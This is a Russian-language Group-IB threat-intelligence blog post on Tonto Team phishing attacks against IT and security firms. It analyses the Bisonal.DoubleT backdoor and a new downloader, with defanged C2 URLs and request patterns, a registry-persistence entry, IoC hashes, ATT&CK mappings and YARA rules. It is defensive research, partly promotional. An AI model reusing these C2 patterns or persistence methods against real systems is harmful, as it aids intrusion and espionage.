В 2023 году IT-компании остаются одной из самых привлекательных мишений для кибератак, говорится в свежем аналитическом отчете «Эволюция киберпреступности. Анализ, тренды и прогнозы 2022/2023». Скомпрометированная инфраструктура вендора открывает широкие возможности для атакующих продвинуться дальше по сети и получить доступ к огромному пулу его клиентов и партнеров. Помните, как успешная атака группировки Dark Halo на американского разработчика SolarWind — поставила под удар Microsoft, Cisco, FireEye, Mimecast и еще 18 000 других компаний?
Геополитический кризис втянул в кибервойну не только хакерские группировки и активистов из стран-участниц конфликта. Свою выгоду пытались извлечь даже страны, которые в нем напрямую не участвуют.
Летом 2022 года, система Group-IB Managed XDR обнаружила и заблокировала вредоносную рассылку, нацеленную на специалистов нескольких ведущих ИБ-компаний. Изучая эту сработку, Анастасия Тихонова, руководитель группы исследования сложных угроз Group-IB Threat Intelligence, и Дмитрий Купин, ведущий специалист по анализу вредоносного кода Group-IB Threat Intelligence, обнаружили связи выявленной кампании с китайской группировкой Tonto Team — и итог их исследования достоин отдельного блога. Эти выводы были представлены Анастасией Тихоновой на конференции “GovWare 2022” в Сингапуре.
Традиционно мы приводим индикаторы компрометации, связанные с кампанией Tonto Team, а также подробный анализ инструментов, техник и процедур (TTPs) группировки, описанных на основе матрицы MITRE ATT&CK® (Adversarial Tactics, Techniques & Common Knowledge). Эти сведения будут полезны организациям, которые борются с киберпреступностью, а также руководителям служб информационной безопасности, SOC-аналитикам, специалистам по реагированиям на инциденты, а также компаниям, чья отраслевая принадлежность потенциально относит их к списку целей Tonto Team.
Наша цель — содействовать сокращению финансовых потерь и простоев инфраструктуры, а также оказывать помощь в принятии превентивных мер по противодействию атакам группы.
Кто такие Tonto Team
Tonto Team (aka HeartBeat, Karma Panda, CactusPete, Bronze Huntley, Earth Akhlut) — хакерская прогосударственная группа кибершпионов, связанная с Китаем. Активна с 2009 года. Tonto Team нацелена на правительственные, военные, финансовые, образовательные учреждения, а также энергетические, медицинские и технологические компании. Изначально работала исключительно по Южной Корее, Японии, Тайваню и США, но к 2020 году среди их целей оказались страны Восточной Европы.
Ключевые выводы
- В июне 2022 года зафиксирована масштабная атака прогосударственной китайской группы Tonto Team на несколько десятков ведущих IT-компаний. Система Group-IB Managed XDR задетектировала попытку атаки — неудачную — и на сотрудников компании Group-IB.
- В ходе атаки хакеры использовали фишинговые электронные письма для доставки документов Microsoft Office, которые были созданы в компоновщике вредоносных RTF-эксплойтов Royal Road Weaponizer. Этот инструмент активно используется китайскими прогосударственными группами.
- Сами рассылки были стилизованы под письма и почтовые адреса реальных сотрудников ИБ-компаний.
- В ходе атаки было зафиксировано использование бэкдора Bisonal.DoubleT. Инструмент Bisonal.DoubleT является уникальной разработкой китайской прогосударственной группировки Tonto Team.
- Кроме того, атакующие использовали новый загрузчик, который Group-IB назвали TontoTeam.Downloader (aka QuickMute).
Все началось с письма…
Вечером 20 июня 2022 года система Group-IB Managed XDR выдала оповещение о блокировке вредоносных писем, которые пришли двум сотрудникам компании:
Скриншоты сработки в интерфейсе Group-IB Managed XDR
Злоумышленники выдавали себя за реального сотрудника ИБ-компании и использовали фальшивую почту, зарегистрированную в популярном бесплатном почтовом сервисе GMX Mail (Global Message eXchange).
Целенаправленная рассылка по почте задумывалась атакующими как первый этап заражения. Кроме Group-IB, в получателях значились и другие компании из сферы кибербезопасности. Согласно действующему в Group-IB протоколу, мы уведомили наших коллег о проведенной рассылке.
Анализ вредоносного документа
Файл “17.06.2022_Протокол_МРГ_Подгруппа_ИБ.doc” (MD5:80987dcdb36e7cb52bb03f00261aa2bd) был приложен к электронному письму:
Скриншот вложения в интерфейсе Group-IB Managed XDR
Проанализированный файл “17.06.2022_Протокол_МРГ_Подгруппа_ИБ.doc” представляет собой вредоносный RTF-документ, который был создан в компоновщике Royal Road RTF Weaponizer. Royal Road, который, в основном, используется китайскими прогосударственными атакующими. Он позволяет создавать вредоносные RTF-эксплойты с правдоподобным контентом-приманкой для CVE-2017-11882, CVE-2018-0802 и CVE-2018-0798, которые влияют на Microsoft Equation Editor.
Наши коллеги из Malwarebytes и SentinelOne ранее уже “подсветили” некоторые индикаторы компрометации, однако мы бы хотели подробнее остановиться на разборе хода самой атаки.
Документ-приманка имеет следующие метаданные:
Вредоносная закодированная полезная нагрузка dcnx18pwh.wmf (MD5:518439fc23cb0b4d21c7fd39484376ff):
Анализ расшифрованной полезной нагрузки
Расшифрованная полезная нагрузка представляет собой вредоносный EXE-файл формата PE32 (MD5:e40c514739768ba04ab17ff0126c1533), который можно классифицировать как бэкдор Bisonal.DoubleT. Это вредоносное ПО обеспечивает удаленный доступ к зараженному компьютеру и позволяет злоумышленнику выполнять на нем различные команды.
Мы провели статическое сравнение нашего образца Bisonal.DoubleT со старой его версией от 2020 года (MD5:c3d25232add0238d04864fc992e7a330), и нашли похожие строки:
Кроме того, мы динамически сравнили сетевые коммуникации проанализированного образца Bisonal.DoubleT с другими образцами этого семейства вредоносных программ:
| MD5 | e40c514739768ba04ab17ff0126c1533 (образец 2022 г.) |
c3d25232add0238d04864fc992e7a330 (образец 2020 г.) |
| URL | hXXp://137.220.176[.]165/ru/order/index.php?strPageID=234989760 | hXXp://www.offices-update[.]com/ru/order/index.php?strPageID=234989760 |
| User-Agent | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\r\nCookie: JSESSIONID=AHAKQAIOMIBQAAA3HEKQAAIAAAAAMAAAAAAQ AAAAAEFAASSFKJJE6TCEFVIEGBQAJVUWO5LFNQFAASSFK JJE6TCEFVIEGAAAAIADEMQ= |
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 |
Красным выделены одинаковые паттерны сетевых запросов, а синим — генерируемый ID.
Образец 2022 г. с MD5: e40c514739768ba04ab17ff0126c1533
Образец 2020 г. с MD5: c3d25232add0238d04864fc992e7a330
Также по C2 offices-update[.]com из образца 2020 г. в публичном отчете IZ:SOC нашли схожий образец семейства Bisonal:
Обращение к C2 образца Bisonal из публичного отчета IZ:SOC
Как видно из таблицы и представленного скриншота, сетевые запросы очень похожи.
Основные функциональные возможности Bisonal.DoubleT:
- сбор информации о скомпрометированном хосте: языковая кодировка системы, адрес прокси-сервера, время с момента загрузки системы, имя хоста, имя учетной записи, под которой запущен файл, локальный IP-адрес;
- получение списка процессов;
- завершение указанного процесса;
- получение удаленного доступа к cmd.exe;
- загрузка файла с управляющего сервера и его запуск;
- создание файла на диске с использованием локальной языковой кодировки.
Собранная информация о скомпрометированном хосте кодируется с помощью алгоритма Base32.
Все важные строки зашифрованы с помощью следующего алгоритма RC4 в нестандартной реализации с S-блоком 128 байт:
После расшифровки строки выглядят следующим образом:
Передаваемые данные в POST-запросе (отправка результата выполнения команды) шифруются тем же алгоритмом, что и строки в теле вредоносного ПО.
Основные шаблоны коммуникаций между C&C и Bisonal.DoubleT:
| Запрос | Шаблон | Пример |
| Hello – GET запрос | hXXps://137[.]220[.]176[.]165/ru/order/index.php?strPageID=[ID], где ID – десятичное число | hXXps://137[.]220[.]176[.]165/ru/order/index.php?strPageID=167880896 |
| Command – GET запрос | hXXps://137[.]220[.]176[.]165/ru/news/index.php?strPageID=[ID]&newsID=[YYYY-MM-DD-mmss] | hXXps://137[.]220[.]176[.]165/ru/news/index.php?strPageID=167880896&newsID=2022-06-21-1023 |
| Response – POST запрос | hXXps://137[.]220[.]176[.]165/xhome[.]native[.]page/datareader.php?sid=[ID] | hXXps://137[.]220[.]176[.]165/xhome[.]native[.]page/datareader.php?sid=167880896 |
| Download & Execute – GET запрос | hXXps://137[.]220[.]176[.]165/siteFiles/index.php?strPageID=[ID] | hXXps://137[.]220[.]176[.]165/siteFiles/index.php?strPageID=167880896 |
Атрибуция
Упомянутый выше набор файлов, можно считать связанным с китайской прогосударственной группой Tonto Team. Вредонос Bisonal.DoubleT был ранее атрибутирован к этой группировке и используется хакерами как минимум с 2019 года.
Анализ инфраструктуры показал использование IP-адреса (137[.]220[.]176[.]165), который ранее уже был замечен в атаках. Приманка точно также была создана в Royal Road RTF Weaponizer.
Скриншот графового анализа сетевой инфраструктуры злоумышленников
Таким образом, мы отметили несколько взаимосвязей замеченной активности с китайскими злоумышленниками:
- Документы-приманки часто содержат метаданные, указывающие на то, что операционная система создателя документа использовала упрощенный китайский язык.
- Документы создаются с помощью вредоносного компоновщика документов, активно используемого китайскими APT-группами — Royal Road.
- Вредоносные документы, как правило, применяются для доставки кастомных вредоносных программ. Bisonal, и сама версия DoubleT, могут быть связаны с группировкой Tonto Team (Китай), и существуют более 10 лет с постоянным развитием.
- Tonto Team не раз проявляла интерес к сектору информационных технологий. Например, в марте 2021 группа взломала почтовые серверы закупочной компании и консалтинговой компании, специализирующейся на разработке программного обеспечения и кибербезопасности, базирующихся в Восточной Европе.
С высокой долей вероятности специалисты Group-IB полагают, что за данной атакой стоит группа Tonto Team.
Оказалось, что мы уже видели их раньше
Во время исследования, мы задались вопросом, а что если это не первая попытка Tonto Team атаковать Group-IB? В целях проверки данной гипотезы, мы изучили всю базу обезвреженных вредоносных рассылок в системе Group-IB Managed XDR и буквально через несколько секунд обнаружили то, что искали. Летом 2021 года Tonto Team уже пыталась — и также неудачно — атаковать сотрудников Group-IB.
На скриншоте ниже видно, как 28 июня 2021 года система Group-IB Managed XDR блокирует входящее письмо на почтовые адреса наших сотрудников.
Скриншоты обработки в интерфейсе Group-IB Managed XDR 28 июня 2021 года
Внутри этого письма оказался файл, который мы задетектировали как вредоносный. Система детонирования вредоносного ПО Group-IB Malware Detonation Platform проанализировала вредоносное вложение, благодаря чему мы смогли увидеть следующую картину:
Скриншот отчета из системы Group-IB Malware Detonation Platform (MDP)
То есть всё по накатанной?
Итак, злоумышленники использовали почтовые рассылки как начальный вектор компрометации и снова воспользовались фальшивой почтой, зарегистрированной в сервисе GMX Mail.
Анализируемый файл “30 июня в 17.30 – очередное заседание Исполкома АДЭ.doc” (MD5: 7c138c6b6f88643d7c16e741f98e0503) — это вредоносный RTF-документ, который был создан в Royal Road RTF Weaponizer. Приманка содержит информацию о следующей встрече Исполнительного комитета “Ассоциации документальной электросвязи”:
Вид вредоносного документа
Приманка имеет следующие метаданные:
Вредоносная закодированная полезная нагрузка (8.t MD5: d5d0a1a034dcefdb08d9ca51c7694a22):
Анализ расшифрованной полезной нагрузки
Расшифрованная полезная нагрузка представляет собой вредоносный DLL-файл формата PE32, который можно классифицировать как Bisonal.Dropper. Это вредоносное ПО используется для развертывания в системе жертвы бэкдора Bisonal. Дата компиляции: 28.06.2021 01:44:01 UTC (что 9:44 по Пекину, Китай — доброе рабочее утро!).
Bisonal.Dropper создает файл “%AppData%\Roaming\conhost.exe” (Bisonal.DoubleT backdoor). Он записывает случайные данные оверлея в “conhost.exe” чтобы изменить хэш бэкдора.
Дроппер также добавляет “conhost.exe” в автозагрузку системы, создав параметр ключа реестра:
[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] userInit = "%AppData%\Roaming\conhost.exe"
Бэкдор запустится только после перезагрузки системы.
Bisonal.DoubleT может писать в файл журнала “%windows%\temp\log.txt” следующие сообщения об ошибках:
- “[!] get pRegSetValueEx error\n”
- “[!] get pGetProcAddress error\n”
- “[!] get LoadLibraryA error\n”
“conhost.exe” (MD5: f53965ab81f746f5a2bf183d2a704c72) — вредоносный EXE-файл формата PE32, который можно классифицировать как бэкдор Bisonal.DoubleT. Сравнивая этот образец 2021 года с образцом 2022 года мы не отметили разницу в функциональных возможностях и алгоритмах шифрования.
В образце 2021 года также все важные строки зашифрованы с помощью алгоритма RC4 в нестандартной реализации с S-блоком 128 байт:
После расшифровки строки выглядят так:
Кроме того мы сравнили расшифрованные строки образцов 2022 и 2021 годов. Красным выделены отличающиеся строки образца 2022 г., а желтым — образца 2021 г. Ниже представлен результат сравнения строк указанных образцов Bisonal.DoubleT:
Основные шаблоны коммуникаций между C&C и Bisonal.DoubleT:
| Запрос | Шаблон | Пример |
|---|---|---|
| Hello – GET запрос | hXXps://103[.]85[.]20[.]194/ru/order/index.php?strPageID=[ID], где ID – десятичное число | hXXps://103[.]85[.]20[.]194/ru/order/index.php?strPageID=167880896 |
| Command – GET запрос | hXXps://103[.]85[.]20[.]194/ru/news/index.php?strPageID=[ID]&newsID=[YYYY-MM-DD-mmss] | hXXps://103[.]85[.]20[.]194/ru/news/index.php?strPageID=167880896&newsID=2022-06-22-1422 |
| Response – POST запрос | hXXps://103[.]85[.]20[.]194/xhome[.]native[.]page/datareader.php?sid=[ID] | hXXps://103[.]85[.]20[.]194/xhome[.]native[.]page/datareader.php?sid=167880896 |
| Download & Execute – GET запрос | hXXps://103[.]85[.]20[.]194/siteFiles/index.php?strPageID=[ID] | hXXps://103[.]85[.]20[.]194/siteFiles/index.php?strPageID=167880896 |
И совсем ничего нового?
В рамках атак июня 2022 года, Tonto Team взяла на вооружение новый загрузчик, который специалисты Group-IB назвали TontoTeam.Downloader. Он был назван QuickMute в другом публичном источнике.
Как обычно, группировка использовала вредоносный RTF-документ, который был создан в Royal Road – Вниманию.doc (MD5: 8cdd56b2b4e1e901f7e728a984221d10).
Вредоносная закодированная полезная нагрузка:
Анализ TontoTeam.Downloader
Расшифрованная полезная нагрузка представляет собой вредоносный EXE-файл формата PE32 (MD5: 66c46b76bb1a1e7ecdb091619a8f5089), который можно классифицировать как загрузчик. Этот файл используется злоумышленником для загрузки следующей стадии вредоносного ПО, которое представляет собой DLL с указанной экспортируемой функцией “HttpsVictimMain”.
Данные конфигурации анализируемого файла зашифрованы с помощью RC4. Ключ содержится в теле вредоносной программы и имеет длину 256 байт.
Расшифрованные данные конфигурации:
| Параметр | Значение | Описание |
| param_1 | https | Тип сетевого протокола |
| param_2 | upportteam[.]lingrevelat[.]com | Доменное имя |
| param_3 | 443 | Сетевой порт |
| param_4 | 1111111111111111111111111111111111
11111111111111111111111111111111111111111 1111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111 |
Настройка времени работы (вредонос работает по определенным дням недели в определенное время) |
| param_5 | {A931568B-94AF-449D-B7F6-6585EF9E9839} | Имя мьютекса |
| param_6 | https-note-86 | Неизвестно, возможно идентификатор вредоносной программы |
| param_7 | `[#o_*#]` | Имя прокси сервера (если значение равно `[#o_*#]`, то значение данного параметра равно 0) |
| param_8 | `[#o_*#]` | Сетевой порт прокси-сервера |
| param_9 | `[#o_*#]` | Имя пользователя прокси-сервера |
| param_10 | `[#o_*#]` | Пароль прокси-сервера |
| param_11 | `[#o_*#]` | Не используется |
Функциональные возможности TontoTeam.Downloader:
- Многопоточность.
- Важные строки (название экспортируемой функции, User-Agent, URL-путь и т.д.) передаются через стек.
- Использует алгоритмы шифрования: RC4, XOR.
- Создает окно “Notepad” с классом “Wrap”.
- Создает мьютекс “{A931568B-94AF-449D-B7F6-6585EF9E9839}”.
- Создает мьютекс “QuitMutex%d”, где %d – PID текущего запущенного процесса (загрузчик). Он используется для предотвращения повторной загрузки и запуска файла полезной нагрузки.
- Проверяет локальное время и сравнивает его со значением в param_4. Если значение массива из param_4 по индексу произведения часа и дня недели (которые берутся из местного времени на компьютере жертвы) не равно 1, то основная функциональность не выполняется.
- Загружает по сетевому адресу hXXtps://upportteam[.]lingrevelat[.]com/update/v32/default полезную нагрузку, после расшифровки которая представляет собой динамически-подключаемую библиотеку (DLL) с экспортируемой функцией “HttpsVictimMain”. DLL зашифрована алгоритмами RC4 и XOR. Алгоритм XOR расшифровывает данные по смещению 0x104 (260) байт, которые предварительно расшифровываются RC4.
Пример сетевого запроса:
GET /update/v32/default HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Host: upportteam[.]lingrevelat[.]com
- Может использовать настройки системного прокси-сервера или указанные в конфигурационных данных.
- Расшифровывает загруженные данные с URL-адреса и проверяет являются ли они файлом формата PE32.
- Загружает в память полезную нагрузку следующей стадии (загруженная вредоносная DLL) и вызывает экспортируемую функцию “HttpsVictimMain”, также передает в данной функции следующие параметры: доменное имя, сетевой порт, ключ RC4 (содержится в загруженной DLL), количество часов дней недели, неизвестный параметр со значением “https-note-86”, прокси-сервер, сетевой порт прокси, пользователь и пароль прокси-сервера.
Выводы
Специалисты Group-IB ранее уже предупреждали об угрозах со стороны китайских прогосударственных групп TaskMasters и TA428, атакующих федеральные органы исполнительной власти. На основе проведенного исследования эксперты Threat Intelligence делают вывод, что за атаками 2021-2022 годов на компании из сферы информационной безопасности стоит группа Tonto Team. Следуя своей миссии — бороться с киберпреступностью — Group-IB уведомила о попытках компрометации другие компании, которые нам удалось идентифицировать, из списка рассылки, чтобы они предприняли необходимые меры для защиты своих инфраструктур.
Основной целью китайских злоумышленников является шпионаж и кража интеллектуальной собственности, поэтому нередко жертвами киберпреступников становятся организации государственного, военного, технического и исследовательского секторов. Группа Tonto Team несомненно продолжит попытки атаковать ИТ-организации с помощью хорошо известных методов атак — рассылка вредоносных документов, использующих уязвимости с приманками, специально подготовленными для этих целей.
Компрометация компаний в сфере информационных технологий и информационной безопасности опасна тем, что открывает доступ атакующим к большому количеству клиентов и партнеров. Поэтому ИБ-компаниям необходимо особенно тщательно следить за обновлением инструментов, а также тактик и методов атакующих, используя системы класса Group-IB Managed XDR для продвинутого обнаружения, реагирования и остановки угроз. Именно это решение показало свою эффективность, предотвратив попытки Tonto Team атаковать сотрудников компании, а также — предупредить другие организации о том, что они в списке целей злоумышленников и помочь им отразить эти и подобные им атаки.
Отметим, что в состав Group-IB Managed XDR входит весь комплекс передовых технологических решений, способных в автоматизированном режиме остановить сложные целевые атаки:
- Endpoint Detection & Response (EDR)
- Network Traffic Analysis (NTA)
- Malware Detonation Platform (MDP)
- Business Email Protection (BEP)
- Threat Intelligence (TI)
- Managed Services (MS)
Подробнее о системе можно узнать из нашего блога.
Следуя миссии Group-IB — борьбе с киберпреступностью — мы продолжим изучать методы, инструменты и тактику Tonto Team.
Мы также будем продолжать информировать об этой угрозе организации, на которые нацелились эти атакующие, во всем мире. Мы всегда стремимся к тому, чтобы атакованные организации были уведомлены в самом скорейшем времени после обнаружения вредоносной активности, что помогло бы снизить потенциальный ущерб от действий атакующих. Также мы считаем своей задачей делиться своими находками с коммьюнити по кибербезопасности и призываем исследователей совместно изучать сложные угрозы, обмениваться данными и использовать наши технологии, как инструмент борьбы со злоумышленниками.
Так, наша система система Group-IB Threat Intelligence, данные из которой были использованы при подготовке этого исследования, позволяет сфокусироваться на основных киберугрозах, которые актуальны на данный момент для региона, индустрии или самой организации. Киберразведка предоставляет подписчикам оперативный доступ к аналитике как о самих атакующих — финансово мотивированных хакерах, прогосударственных атакующих (APT), хактивистах, так и их тактиках и инструментах.
Попробуйте F.A.С.С.T. Threat Intelligence прямо сейчас!
Оптимизируйте принятие стратегических, оперативных и тактических решений с помощью лучшей в своем классе аналитики киберугроз.
IoCs
17.06.2022_Протокол_МРГ_Подгруппа_ИБ.doc
- MD5: 80987dcdb36e7cb52bb03f00261aa2bd
- SHA1: 2abf70f69a289cc99adb5351444a1bd23fd97384
- SHA256: c7018ee3783f4b2fb19fedc78c59586390efa1b72c907867794bf42141eb767c
Вниманию.doc
- MD5: 67bfa75dbc39ab88da995c21565d05ca
- SHA1: f599ed4ecb6c61ef2f2692d1a083e3bb040f95e6
- SHA256: 7970393e506934e9304f1d18ced34b86ef04a0d278d8e3cdb4b0064caee73846
О_формировании_проекта_ПНС_2022_файл_отображен.doc
- MD5: b8387fc571a8e79efab3e2cc343aae24
- SHA1: 2b7975e6b1e9b72e9eb06989e5a8b1f6fd9ce027
- SHA256: c2ba362693aad8686f79822712c3871f0da1570465578843f5d73c70db07e631
замечания таблица 20.06.2022.doc
- MD5: 001b53acfab523dc060d38d73d63feef
- SHA1: a501fec38f4aca1a57393b6e39a52807a7f071a4
- SHA256: d79dcb90dfc01723f8df5628f502352c6f922187d3ef5942a6e8465552f40edf
dcnx18pwh.wmf (encoded RoyalRoad payload)
- MD5: 518439fc23cb0b4d21c7fd39484376ff
- SHA1: 071f19019fa7b8fae94aace54167c1b085f5c050
- SHA256: 0f704f3ab4a3ec30656dab6094c582b1089cbc8fcba280cadf3c7a651aeaacc3
– (decoded RoyalRoad payload – Bisonal.DoubleT)
- MD5: e40c514739768ba04ab17ff0126c1533
- SHA1: f714f02e935bc70f3b10184b15343601b33a24d2
- SHA256: 58c1cab2a56ae9713b057626953f8967c3bacbf2cda68ce104bbb4ece4e35650
30 июня в 17.30 – очередное заседание Исполкома АДЭ.doc
- MD5: 7c138c6b6f88643d7c16e741f98e0503
- SHA1: c9e4390ae500fc4d9704b665f981a61bc504bf46
- SHA256: bc78ba16d9495b17918d31e893a5f10d8a87d16a4a88f9bfd3ed5c735ce2ae11
8.t (encoded RoyalRoad payload)
- MD5: d5d0a1a034dcefdb08d9ca51c7694a22
- SHA1: 5c22539218a08e9ec181cb2d89853b9aeb65c1bc
- SHA256: 64fabaf342a23f1777f6895383eddb4fc065d6c4d8608cebea51c30064b5c2a8
– (decoded RoyalRoad payload – Bisonal.Dropper)
- MD5: 40caac250ef2f2937521e4d8374477e7
- SHA1: 9d5daba847044ab63c926f9c740e47ee079f09d6
- SHA256: 1c86452b222c8e631b0434585000466814f92f71d81576e03e0a118409019842
conhost.exe – Bisonal.DoubleT (backdoor)
- MD5: f53965ab81f746f5a2bf183d2a704c72
- SHA1: 5b01f3425b8fd053bd93b0d0aef2f04a950de7b2
- SHA256: 8597e6b9f5f61c68a9ef219513dd43dd36e269b738f849b1dda44b576c865d39
Вниманию.doc
- MD5: 8cdd56b2b4e1e901f7e728a984221d10
- SHA1: cb8eb16d94fd9242baf90abd1ef1a5510edd2996
- SHA256: 7944fa9cbfef2c7d652f032edc159abeaa1fb4fd64143a8fe3b175095c4519f5
dcnx18pwh.wmf (encoded RoyalRoad payload)
- MD5: 83b8d4462566a23298ca38c418eeccde
- SHA1: 159b8b3bddbe60654d2be40416c6d6e74eeb86fa
- SHA256: f76f3277385195c27fdf2f90a01a8dd70bd05d92ab70696a6e6d7b0d5fb8e70c
– (decoded RoyalRoad payload – TontoTeam.Downloader)
- MD5: 66c46b76bb1a1e7ecdb091619a8f5089
- SHA1: d858d9e11fc027ce7102ef150b412d1eaf34c544
- SHA256: c357faf78d6fb1460bfcd2741d1e99a9f19cf6dffd6c09bda84a2f0928015398
Пояснительная записка к ЗНИ.doc
- MD5: 543bb103b8ad231ca53f6c1eb369c094
- SHA1: 415ce2db3957294d73fa832ed844940735120bae
- SHA256: 43622526694b40bad5fde8971f7937a22b8e6f4012dbd39cd4746429e056c609
dcnx18pwh.wmf (encoded RoyalRoad payload)
- MD5: d748141a5878b7ef21c2663e9a1cdd2d
- SHA1: dc943ff76af8384913bc0b79573fea71c7999a08
- SHA256: 10f881212a7c60f1da2f0b0473a7f1dd0af0b99a1e154f46f7fed45d92b7b05d
– (decoded RoyalRoad payload – Bisonal.DoubleT)
- MD5: d598baa47b9bcb4f5059a81515f9480b
- SHA1: 295a4c55c24260fad46e00f6935c7172f207c247
- SHA256: dcb854e32d3ca08852371673ed7cd9139af761b8b127113746a527050b5e2b1d
РЭН 2022.doc
- MD5: ab5cd5dfc157c70b9872fed13774e039
- SHA1: 1c848911e6439c14ecc98f2903fc1aea63479a9f
- SHA256: 0828b9834e1f967fc68d7dd577cc40c63715ee1a37786437c46af3ccd6ac79ea
- 103.85.20[.]194:443
- 137.220.176[.]165:443
- 137.220.176[.]215
- upportteam[.]lingrevelat[.]com
- supportteam[.]lingrevelat[.]com
- news[.]wooordhunts[.]com
- hXXps://upportteam[.]lingrevelat[.]com/update/v32/default
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\r\nCookie: JSESSIONID=[Base32 encoded information about victim computer]
{A931568B-94AF-449D-B7F6-6585EF9E9839}
QuitMutex%d, где %d – PID текущего запущенного процесса (загрузчик)
Техники, тактики и процедуры группы Tonto Team в соответствии с MITRE ATT&CK®
Техники, тактики и процедуры групы Tonto Team в соответствии с MITRE ATT&CK®
T1566.001 Phishing: Spearphishing Attachment
T1204.002 User Execution: Malicious File
T1203 Exploitation for Client Execution
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1027 Obfuscated Files or Information
T1140 Deobfuscate/Decode Files or Information
–
T1124 System Time Discovery
T1057 Process Discovery
T1082 System Information Discover
T1614.001 System Location Discovery: System Language Discovery
T1016 System Network Configuration Discovery
T1033 System Owner/User Discovery
–
–
T1071.001 Application Layer Protocol: Web Protocols
T1573.002 Encrypted Channel: Asymmetric Cryptography
T1001 Data Obfuscation
T1105 Ingress Tool Transfer
T1041 Exfiltration Over C2 Channel
–
YARA rules
import "pe"
rule apt_tontoteam__bisonal_doublet
{
meta:
author = "Dmitry Kupin"
company = "Group-IB"
description = "Detects Bisonal.DoubleT samples"
date = "2022-06-20"
hash = "58c1cab2a56ae9713b057626953f8967c3bacbf2cda68ce104bbb4ece4e35650"
strings:
$s0 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=" fullword ascii
$s1 = "{\"status\":\"success\"}" fullword ascii
$s2 = "GetNativeSystemInfo" fullword ascii
$s3 = "::Off" fullword ascii
$s4 = "::On" fullword ascii
condition:
all of ( $s* ) or pe.imphash ( ) == "2edcf20dae8aede04f118ccf201f5bd2" or pe.imphash ( ) == "7f112e0b3c0a7ba76132c94ad9501c2a" or pe.imphash ( ) == "99dd7d50528327476d4b7badce66aff1" or pe.imphash ( ) == "7f112e0b3c0a7ba76132c94ad9501c2a"
}
rule apt_tontoteam__downloader
{
meta:
author = "Dmitry Kupin"
company = "Group-IB"
description = "Detects TontoTeam.Downloader samples"
date = "2022-06-17"
hash = "c357faf78d6fb1460bfcd2741d1e99a9f19cf6dffd6c09bda84a2f0928015398"
strings:
$config_parse_str = "%[^!]!%[^$]$%[^$]$%[^$]$%[^$]$%[^$]$%[^$]$%[^$]$%[^$]$%[^$]$%[^$]" fullword wide
$s_file_description = "Wrap Module" fullword wide
$s_mutex = "QuitMutex%d" fullword wide
$s_window_name = "Notepad" fullword wide
$s_window_class_name = "Wrap" fullword wide
$rc4_key = { 38 05 87 0F 0C 6B 9F 2A 2B 1F F8 DA D2 6E 1E 42
8D 3D 07 5F 36 F9 91 21 FC 7D EB 8A 06 C7 66 3F
29 2F EF FB 78 B6 1B 7B 04 14 B2 30 98 D0 7F 8B
BF EC 47 FE 94 5D A6 CF 15 44 FF AB C9 57 46 81
93 69 82 58 08 03 B5 68 25 83 1D 0A 1A 9E D6 48
2E 09 EA C1 02 0D 51 F2 6C 0B 4D E8 A9 32 5B AE
B7 A7 C5 01 3A 8F 72 00 4E 76 DB 65 4A 23 70 BA
97 52 D7 D4 E2 8E 89 3B AC 9B 90 63 28 1C 39 A0
77 27 A5 0E EE D5 4C E7 41 B8 9A 17 B4 37 A4 F1
A3 55 C4 B9 CD CC 88 D1 CB 18 22 4F 2D 8C E5 9D
BB F5 35 60 FA 84 E0 73 13 C6 C2 79 B3 5E 71 26
D9 F7 3C 2C F3 45 7A 43 10 4B CE E6 86 16 ED AD
12 BC DE 85 AF 19 A8 C8 E3 E9 31 F0 61 5A 99 75
A2 E1 56 B0 D8 53 7C DD DF BE E4 80 C0 54 C3 74
7E 6D 20 49 64 67 B1 40 A1 95 D3 DC BD 24 9C FD
3E 6F 5C 62 34 F4 6A 50 CA 92 AA 96 33 11 F6 59 }
$protocols = { 00 74 00 63 00 70 00 00 00 75 00 64 00 70 00 00
00 68 00 74 00 74 00 70 00 00 00 00 00 68 00 74
00 74 00 70 00 73 00 00 00 25 00 73 00 3A 00 25
00 64 00 }
condition:
$config_parse_str or $rc4_key or $protocols or all of ( $s_* ) or pe.imphash ( ) == "dab6180d5f5d53c54c91914103919d40"
}
